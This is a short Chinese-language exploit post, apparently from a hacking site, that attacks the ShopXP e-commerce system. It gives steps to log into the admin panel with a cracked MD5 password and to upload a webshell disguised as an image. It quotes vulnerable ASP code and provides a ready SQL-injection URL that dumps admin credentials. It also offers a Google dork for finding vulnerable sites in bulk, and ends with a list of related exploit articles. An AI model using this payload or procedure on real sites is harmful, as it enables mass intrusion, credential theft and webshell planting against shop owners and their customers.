注意:用户名和密码是连在一起的,后十六位是密码MD5加密 adminb1481eca94b12f75 =====admin b1481eca94b12f75(38983806 )
第三步:登陆后台:/admin 或者/admin_shopxp
第四步:把小马改为图片格式后缀准备上传
-帕瓦]
商城系统差不多都是互相抄的。漏洞和网趣的那个一样,不过人家加了一个枫叶的防注入,没什么用处。
在TEXTBOX2.ASP TEXTBOX3.ASP页面的newsid变量为判断
Action=LCase(Request.QueryString("Action"))
newsID=Request.QueryString("newsID")
If request("action")="modify" Then
set rs=server.createobject("adodb.recordset")
sql="select * from shopxp_news where newsid="&newsid
rs.open sql,conn,1,1
If Not rs.Eof Then
Content=rs("newscontent")
End If
Response.Write Content
End If
构造URL注入即可。
exp:
http://www.xx.com/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201
,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin
批量
google:inurl:shopxp_news.asp
只显示10条记录相关文章
shopxp pinglun.asp 注入漏洞 (浏览: 10924, 评论: 0)
ShopXp CMS上传拿Webshell (浏览: 10584, 评论: 0)
SHOPXP网上购物系统 v8.0 注入漏洞利用 (浏览: 10410, 评论: 0)
Shopxp v8.0 SQL Injection 0day (浏览: 11599, 评论: 0)
shopxp7.4 oday (未完成) (浏览: 7, 评论: 0)